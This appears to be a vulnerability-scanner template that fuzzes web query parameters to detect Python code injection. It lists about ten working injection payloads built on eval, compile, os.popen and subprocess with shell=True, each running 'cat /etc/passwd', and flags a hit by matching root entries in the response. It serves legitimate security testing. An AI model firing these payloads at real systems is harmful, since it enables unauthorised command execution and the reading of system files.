id: python-code-injection
info:
name: Python Code Injection
author: ritikchaddha
severity: high
tags: python,dast,injection,cmdi,vuln
variables:
Command: "cat /etc/passwd"
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
injection:
- eval(compile("""for x in range(1):\\n import os\\n os.popen(r'{{Command}}').read()""",'','single'))
# without loop, one expression
- eval(compile("""__import__('os').popen(r'{{Command}}').read()""",'','single'))
# without loop, one expression
- eval(compile("""__import__('subprocess').check_output(r'{{Command}}',shell=True)""",'','single'))
# without compile
- __import__('os').popen('{{Command}}').read()
# multiple expressions, separated by commas
- str("-"*50),__import__('os').popen('{{Command}}').read()
# multiple statements, separated by semicolons
- eval(compile("""__import__('os').popen(r'{{Command}}').read();import time;time.sleep(2)""",'','single'))
- eval(compile("""__import__('subprocess').check_output(r'{{Command}}',shell=True);import time;time.sleep(2)""",'','single'))
# with `for` loop technique, without global __import__ using subprocess.popen
- eval(compile("""for x in range(1):\n import os\n os.popen(r'{{Command}}').read()""",'','single'))
- eval(compile("""for x in range(1):\n import subprocess\n subprocess.Popen(r'{{Command}}',shell=True, stdout=subprocess.PIPE).stdout.read()""",'','single'))
- eval(compile("""for x in range(1):\n import subprocess\n subprocess.check_output(r'{{Command}}',shell=True)""",'','single'))
fuzzing:
- part: query
type: replace
fuzz:
- "{{injection}}"
stop-at-first-match: true
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
# digest: 4b0a00483046022100d20dead9d43184682b9162961ee82df8d0c89d9dcb2b219668c1f607b37c6a6f022100cddb28a5648ce05e0666ef2b25997ab11ea7c2dde5d78d7bb8245fb67e73ec39:922c64590222798bb761d5b6d8e72950